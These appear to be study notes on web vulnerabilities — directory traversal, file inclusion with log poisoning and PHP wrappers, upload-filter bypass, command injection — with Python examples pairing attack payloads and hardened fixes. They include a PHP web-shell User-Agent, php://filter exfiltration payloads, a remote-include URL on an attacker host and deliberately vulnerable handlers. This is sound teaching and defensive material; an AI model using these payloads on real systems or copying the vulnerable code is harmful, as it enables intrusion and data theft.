Content
Directory traversal
File inclusion vulnerabilities
File upload vulnerabilities
Command injection
9.1. Directory traversal
Leaks a file from the file system of the server (e.g. /etc/passwd) by escaping the directory the application reads from
Look for URL parameters that name a file, e.g. content=index.html, and replace the value with a relative path
Unix: ../
Windows: ../ or ..\
Also try URL-encoded (%2e%2e%2f) and nested (....//) variants, since naive filters only strip a literal ../ once
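The three handler variants below (no check, a one-pass "../" strip, and a real path check against the web root) are an added example, not code from the original notes. The web root, the secret file one level above it and the content parameter are constructed for the demo; in a real target the interesting file would be something like /etc/passwd.

```python
"""Directory traversal in a ?content= file handler: vulnerable, naively
filtered and hardened variants side by side.

Added example, not code from the original notes.  The web root, the
"secret" file one level above it and the parameter name are constructed
for the demo.
"""
import os
import tempfile
from typing import Optional
from urllib.parse import unquote

# Constructed sandbox: a fake web root with one legitimate page and a
# file just outside it that the handler must never return.
_SANDBOX = tempfile.mkdtemp()
WEB_ROOT = os.path.join(_SANDBOX, "www")
os.makedirs(WEB_ROOT)
with open(os.path.join(WEB_ROOT, "index.html"), "w") as fh:
    fh.write("<h1>hello</h1>")
with open(os.path.join(_SANDBOX, "secret.txt"), "w") as fh:
    fh.write("root:x:0:0:root:/root:/bin/bash\n")

# Typical values tried against ?content=... (the server URL-decodes first)
TRAVERSAL_PAYLOADS = [
    "../secret.txt",          # plain Unix traversal
    "..\\secret.txt",         # Windows separator; Unix treats '\' as a filename char
    "%2e%2e%2fsecret.txt",    # URL-encoded ../
    "....//secret.txt",       # survives a single, non-recursive "../" strip
]


def read_vulnerable(content: str) -> str:
    """Joins the decoded parameter onto the web root with no check at all."""
    with open(os.path.join(WEB_ROOT, unquote(content))) as fh:
        return fh.read()


def read_naively_filtered(content: str) -> str:
    """A common but broken fix: strip "../" once.  "....//" collapses into
    "../" after the strip, so the traversal still works."""
    return read_vulnerable(unquote(content).replace("../", ""))


def resolve_within_root(content: str) -> Optional[str]:
    """Resolve the parameter against the real web root and return the
    absolute path, or None if the resolved path (symlinks included) leaves
    the root.  Backslashes are treated as separators so a Windows-style
    payload cannot slip past on a Windows host."""
    root = os.path.realpath(WEB_ROOT)
    wanted = unquote(content).replace("\\", "/")
    candidate = os.path.realpath(os.path.join(root, wanted))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def read_hardened(content: str) -> str:
    """Fixed handler: refuses anything that resolves outside WEB_ROOT."""
    path = resolve_within_root(content)
    if path is None:
        raise PermissionError("path escapes web root: %r" % content)
    with open(path) as fh:
        return fh.read()
```

Note that os.path.join discards the web root entirely when the parameter is an absolute path, so an absolute /etc/passwd is just as dangerous as ../ and the realpath check has to cover both.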
9.2. File Inclusion Vulnerabilities
"includes" a file into the running code of the web application (e.g. a PHP include statement whose argument is user controlled), which may enable code execution
content:
local file inclusion (LFI)
PHP wrappers
remote file inclusion (RFI)
Directory traversal + file inclusion attack (log poisoning)
Setting
Assume a directory traversal vuln that can reach the Apache log files
The Apache access log contains the User-Agent header of each request, written verbatim
Assume a file inclusion vuln, where the user can include files into the application's code (e.g. via a PHP include statement)
Attack:
Perform a request with a poisoned User-Agent header that contains PHP code
Use the file inclusion vuln to include the Apache log into the application and run the malicious PHP code
Caveats: the web server user must be able to read the log (on Debian-based systems /var/log/apache2/access.log is root:adm 0640 by default, so this often fails there), and a syntax error in the injected PHP breaks every later include of that log
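Both halves of the chain above, plus a log-side check a defender can run, as an added example that is not code from the original notes. The target host, the parameter names (content, cmd), the log path and the traversal depth are assumptions chosen for illustration; the sample log lines are constructed.

```python
"""Apache access-log poisoning chained with LFI: both requests, plus a
log-side check for the poison.

Added example, not code from the original notes.  The target URL, the
parameter names, the log path and the traversal depth are assumptions
chosen for illustration.
"""
import re
from urllib.parse import urlencode

LOG_PATH = "/var/log/apache2/access.log"   # assumption: Debian-style layout


def poison_payload(cmd_param: str = "cmd") -> str:
    """PHP fragment sent as the User-Agent.  Apache writes the header into
    the Combined log verbatim (only non-printables are \\x-escaped), so the
    tags survive until the file is include()d."""
    return "<?php system($_GET['%s']); ?>" % cmd_param


def poison_request(target_host: str, path: str = "/") -> str:
    """Request 1, as the raw HTTP text that goes on the wire."""
    return (
        "GET %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\n\r\n"
        % (path, target_host, poison_payload())
    )


def include_log_url(base_url: str, include_param: str, depth: int,
                    cmd: str, cmd_param: str = "cmd") -> str:
    """Request 2: make the include() read the log and pass the command."""
    traversal = "../" * depth + LOG_PATH.lstrip("/")
    query = urlencode({include_param: traversal, cmd_param: cmd}, safe="/")
    return base_url + "?" + query


# Constructed sample of what ends up in the log (Combined Log Format);
# line 2 is the poisoned request.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET / HTTP/1.1" 200 612 "-" "%s"'
    % poison_payload(),
    '10.0.0.5 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?content=index.html HTTP/1.1" 200 512 "-" "curl/8.0"',
])

_PHP_TAG = re.compile(r"<\?(?:php\b|=)")


def find_poisoned_lines(log_text: str) -> list:
    """Defender side: 1-based line numbers whose User-Agent or URL carries
    a PHP open tag.  Cheap to run over access logs as a detection."""
    return [i for i, line in enumerate(log_text.splitlines(), 1)
            if _PHP_TAG.search(line)]
```

Before poisoning, include the log once with a harmless User-Agent to confirm the traversal depth and that the log is readable at all; once a broken payload is in the file there is no way to remove it.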
PHP wrappers
If the attacker controls the argument of the PHP include statement, PHP stream wrappers can be used: php://filter/convert.base64-encode/resource=<file> returns a PHP file's source base64-encoded instead of executing it (exfiltration), while data:// or expect:// execute inline code (data:// needs allow_url_include=On, expect:// needs the expect extension)
Remote file inclusion
an attacker-controlled file (e.g. http://attacker/shell.txt, served as text so it is not executed on the attacker's side) is included
triggers RCE in PHP
requires the PHP setting allow_url_include=On (Off by default since PHP 5.2), together with allow_url_fopen=On
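The wrapper payloads from the two sections above, the decoder needed to turn a php://filter response back into source, and a php.ini check that tells which of them (filter, data://, remote http://) will work against a given configuration, as an added example that is not code from the original notes. The sample HTML response and php.ini fragments are constructed.

```python
"""PHP wrapper and remote-include payloads for an attacker-controlled
include(), the decoder for php://filter output, and a php.ini check.

Added example, not code from the original notes.  The sample HTML
response and the sample php.ini fragments are constructed.
"""
import base64
import re


def filter_exfil_payload(resource: str) -> str:
    """php://filter returns the file base64-encoded instead of executing it,
    so PHP source (config files with DB passwords, the vulnerable page
    itself) is leaked.  Local wrapper: works with allow_url_include=Off."""
    return "php://filter/convert.base64-encode/resource=" + resource


def data_wrapper_payload(php_code: str) -> str:
    """Inline PHP through the data:// wrapper.  Needs allow_url_include=On."""
    return "data://text/plain;base64," + base64.b64encode(php_code.encode()).decode()


_B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_filter_response(page: str) -> str:
    """The base64 blob lands inside the application's own HTML (header,
    nav, footer).  Take the longest base64 run and decode it."""
    runs = _B64_RUN.findall(page)
    if not runs:
        raise ValueError("no base64 run in response")
    return base64.b64decode(max(runs, key=len)).decode()


def allow_url_include_enabled(ini_text: str) -> bool:
    """Effective allow_url_include value from a php.ini fragment
    (';' starts a comment, last assignment wins, PHP default is Off)."""
    enabled = False
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0].strip()
        m = re.match(r"allow_url_include\s*=\s*(\S+)", line, re.I)
        if m:
            enabled = m.group(1).strip("\"'").lower() in ("on", "1", "true", "yes")
    return enabled


def usable_wrappers(ini_text: str) -> list:
    """Which include payloads an attacker can use against this config."""
    wrappers = ["php://filter"]
    if allow_url_include_enabled(ini_text):
        wrappers += ["data://", "http:// (RFI)"]
    return wrappers


# Constructed: the source of the vulnerable page and the response the
# filter payload would produce once the app wraps it in its own HTML.
SAMPLE_SOURCE = "<?php\n$db_pass = 'constructed-example';\ninclude($_GET['content']);\n"
SAMPLE_PAGE = ("<html><body><div class='nav'>Home</div>"
               + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
               + "<footer>x</footer></body></html>")
```

The resource in filter_exfil_payload is resolved the same way as the include argument itself, so ../ traversal works inside it (e.g. resource=../config.php).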
9.3. File Upload Vulnerabilities
In general three relevant types:
uploading executable code (e.g. PHP files) that the server then runs
the upload path suffers from directory traversal, which allows us to overwrite system files (e.g. authorized_keys)
the uploaded content is served back or parsed by the server, so XSS (e.g. SVG or HTML files) or XXE (e.g. DOCX/XLSX, which are XML inside a zip) attacks are possible
a fourth type, uploading files that will be opened by a victim (e.g. a malicious .docx), is not relevant here
Uploading executable files
avatar, blog post images, CV upload, etc.
if uploads are filtered by extension, try to bypass the filter (alternative extensions such as .phtml, mixed case, double extensions such as .php.jpg, or a changed Content-Type header if that is what is checked)
after upload, find the directory where the file is stored and request it to trigger execution
Uploading non-executable files
the file upload might suffer from a directory traversal vulnerability (filename ../../../root/.ssh/authorized_keys)
this allows an attacker to overwrite system files, such as authorized_keys, and then log in via SSH
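Both upload cases above in code, as an added example that is not from the original notes: the filenames to try against an extension blacklist, beside a hardened naming policy that refuses every dotted suffix outside an allowlist and never uses the client-supplied path, which shuts the traversal-overwrite route as well. The allowed-extension list and the upload directory are assumptions.

```python
"""File upload: extension-blacklist bypass candidates beside a hardened
filename policy that also closes the traversal-overwrite path.

Added example, not code from the original notes.  ALLOWED_EXTS and the
upload directory are assumptions for the demo.
"""
import os
import re
import secrets
import tempfile

# Extensions that Apache/mod_php setups commonly hand to the PHP handler.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif", "pdf"}        # assumption
UPLOAD_DIR = os.path.realpath(tempfile.mkdtemp())          # constructed


def bypass_candidates(blocked_name: str) -> list:
    """Filenames to try when a blacklist rejects e.g. 'shell.php'."""
    stem = blocked_name.rsplit(".", 1)[0]
    return [
        stem + ".phtml",         # alternative extension mapped to the same handler
        stem + ".phar",
        stem + ".PhP",           # case-sensitive filter, case-insensitive handler
        stem + ".php.jpg",       # Apache AddHandler matches any dotted suffix
        stem + ".php\x00.jpg",   # NUL truncation in very old PHP (< 5.3.4)
        stem + ".php.",          # trailing dot is dropped by Windows filesystems
    ]


def client_basename(client_filename: str) -> str:
    """Keep only the last path component, treating both separators as such,
    and drop control characters.  Kills '../../root/.ssh/authorized_keys'."""
    name = client_filename.replace("\\", "/").split("/")[-1]
    return re.sub(r"[\x00-\x1f\x7f]", "", name)


def is_allowed_upload(client_filename: str) -> bool:
    """Every dotted suffix (not just the last) must be on the allowlist, so
    'shell.php.jpg', 'shell.jpg.php' and '.htaccess' are all refused."""
    parts = client_basename(client_filename).lower().split(".")
    if len(parts) < 2 or any(p == "" for p in parts):
        return False
    return all(ext in ALLOWED_EXTS and ext not in EXECUTABLE_EXTS
               for ext in parts[1:])


def safe_upload_path(upload_dir: str, client_filename: str) -> str:
    """Server-chosen random name under upload_dir; the client name only
    contributes its validated extension, so traversal and executable
    names never reach the filesystem."""
    if not is_allowed_upload(client_filename):
        raise ValueError("rejected upload name: %r" % client_filename)
    ext = client_basename(client_filename).lower().rsplit(".", 1)[1]
    root = os.path.realpath(upload_dir)
    path = os.path.realpath(os.path.join(root, secrets.token_hex(16) + "." + ext))
    if os.path.dirname(path) != root:      # belt and braces
        raise ValueError("resolved outside upload dir")
    return path
```

The extension check is only half of it: the upload directory should also be served without a script handler (no PHP execution there) so that a bypass of the name check still does not give code execution.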
9.4. Command Injection
the application passes user input to a system shell without sanitizing it correctly
the user can append shell metacharacters (; | && $( ) `) to inject further commands, which gives RCE on the server
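A vulnerable host-lookup feature beside two hardened versions, as an added example that is not code from the original notes. `echo` stands in for the real network tool (ping, nslookup) so the block runs anywhere; the injection behaves identically with the real tool.

```python
"""Command injection: vulnerable host lookup beside two hardened versions.

Added example, not code from the original notes.  `echo` stands in for
the real network tool (ping, nslookup, ...) so the block runs anywhere.
"""
import re
import shlex
import subprocess

LOOKUP_TOOL = "echo"   # assumption: stand-in for ping/nslookup


def lookup_vulnerable(host: str) -> str:
    """User input concatenated into a shell command line.  "; id", "| id",
    "&& id", "$(id)" and backticks all run as separate commands."""
    cmd = "%s lookup %s" % (LOOKUP_TOOL, host)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def lookup_no_shell(host: str) -> str:
    """Argument vector, no shell: metacharacters reach the tool as plain
    data.  Still lets the user pass option-looking values such as "-v"."""
    return subprocess.run([LOOKUP_TOOL, "lookup", host],
                          capture_output=True, text=True).stdout


# RFC 1123 hostname: labels of alphanumerics and '-', never starting with '-'.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def lookup_hardened(host: str) -> str:
    """Allowlist validation first (rejects metacharacters, spaces and a
    leading '-'), then the no-shell call."""
    if not HOSTNAME_RE.match(host):
        raise ValueError("invalid hostname: %r" % host)
    return lookup_no_shell(host)


def shell_quoted_command(host: str) -> str:
    """If a shell really is unavoidable (pipes, redirects), quote every
    untrusted argument; shlex.quote keeps it a single word."""
    return "%s lookup %s" % (LOOKUP_TOOL, shlex.quote(host))
```

Validation and the argument vector are complementary: the vector stops the shell from interpreting the input, the allowlist stops the tool itself from interpreting it (as an option or a second argument).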